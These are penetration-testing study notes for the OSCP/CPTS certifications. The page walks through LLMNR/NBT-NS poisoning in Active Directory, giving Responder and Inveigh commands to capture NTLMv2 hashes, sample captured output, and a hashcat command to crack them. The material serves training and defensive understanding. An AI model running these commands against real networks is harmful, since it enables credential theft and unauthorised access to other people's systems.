OSCP-CPTS NOTES
TwitterGithubLinkedinInstagramDiscord
  • oscp-cpts-notes
  • Pivoting & Tunneling
    • Local Port Forwarding
    • Remote Port Forwarding
    • Dynamic Port Forwarding
    • Ligolo-ng
  • Linux Privilege Escalation
    • Gathering Information of the System
    • Capabilities
    • Group Based
    • SUID Privilege Escalation
    • Cron Job
    • Exploiting NFS weak Permission
    • Sudo + LD_PRELOAD (Shared Libraries)
    • Shared Object Manipulation
    • Python Library Hijacking
  • Windows Privilege Escalation
    • Gathering Information of the System
    • User Privileges
      • SeImpersonatePrivilege and SeAssignPrimaryToken
      • SeDebugPrivilege
      • SeTakeOwnershipPrivilege
    • Group Privileges
      • Backup Operators
      • DnsAdmins
      • Server Operators
      • Always Install Elevated
      • Print Operators
      • Event Log Readers
      • Hyper-V Administrators
    • Credential Theft
  • Active Directory Attacks
    • Enumeration
    • Initial Foothold
    • Gathering Users & Password Policies
    • Password Spraying
    • Credentialed Enumeration From Linux
    • Credentialed Enumeration From Windows
    • Kerberoasting - From Linux
    • Kerberoasting - From Windows
  • Beyond OSCP - CPTS
    • RED TEAMING
      • Windows Local Persistence
        • Tampering With Unprivileged Accounts
        • Backdooring Files
        • Abusing Services
        • Abusing Scheduled Tasks
        • Logon Triggered Persistence
        • Backdooring the Login Screen / RDP
        • Persisting Through Existing Services
Powered by GitBook
On this page
  • LLMNR/NBT-NS Poisoning
  • Attack Path
  • LLMNR/NBT-NS Poisoning from Linux
  • LLMNR/NBT-NS Poisoning from Windows

Was this helpful?

Edit on GitHub
  1. Active Directory Attacks

Initial Foothold

PreviousEnumerationNextGathering Users & Password Policies

Last updated 7 months ago

Was this helpful?

LLMNR/NBT-NS Poisoning

Attack Path

  • Initial Connection Request: The victim host attempts to connect to a resource on the network by typing \\dollarboy.

  • DNS Failure: The primary server responds to the victim saying that the requested host (\\dollarboy) is unknown because there is no matching DNS record for it.

  • LLMNR Broadcast Request: Since DNS failed, the victim’s machine sends a multicast/LLMNR broadcast across the local network asking, "Does anyone know \\dollarboy?"

  • Attacker Responds: The attacker, running Responder on a Kali machine, listens for such broadcasts and responds, pretending to be \\dollarboy. The attacker tricks the victim into believing it has found the right destination.

  • Authentication Request Sent: The victim, trusting the attacker’s response, tries to authenticate with \\dollarboy by sending its NTLMv2 credentials (username and password hash) to the attacker.

  • Hash Captured and Exploited: The attacker now has access to the NTLMv2 hash, which can either be:

    • Cracked offline to retrieve the plaintext password.

    • Used in an SMB Relay attack to impersonate the user on other systems (if SMB signing is not enforced).

LLMNR/NBT-NS Poisoning from Linux

  • sudo responder -I {interface}

[+] [LLMNR]  Poisoned answer sent to 192.168.1.10 for name DOLLARBOY
[+] [SMB] NTLMv2-SSP Hash captured from 192.168.1.10
[SMB] User: DOMAIN\victim_user
[SMB] NTLMv2 Hash: 
    [+] [LLMNR]  Poisoned answer sent to 192.168.1.10 for name DOLLARBOY
[+] [SMB] NTLMv2-SSP Hash captured from 192.168.1.10
[SMB] User: DOMAIN\victim_user
[SMB] NTLMv2 Hash: 
    victim_user::DOMAIN:1122334455667788:ABCDEF1234567890:010100000000000000E04BDEB8C83F18C351...B8C83F18C351...

Then save the hash in .txt file victim_user::DOMAIN:1122334455667788:ABCDEF1234567890:010100000000000000E04BD..................

  • Then run hashcat to crack the hash hashcat -m 5600 hash.txt /path/to/wordlist.txt

LLMNR/NBT-NS Poisoning from Windows

  • PS C:\dollarboy> Import-Module .\Inveigh.ps1-> Import Inveigh module

  • PS C:\dollarboy> Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y Explanation: -LLMNR Y: Enable LLMNR poisoning. -NBNS Y: Enable NBNS poisoning. -ConsoleOutput Y: Display captured hashes in the PowerShell console. additionally we can use -FileOutput Y to save into file

Once the NTLMv2 Hash is captured, crack with hashcat.

+ We can use executable (C#) version of Inveigh. C# version is constantly updated.

For windows, we can use Inveigh

https://github.com/Kevin-Robertson/Inveigh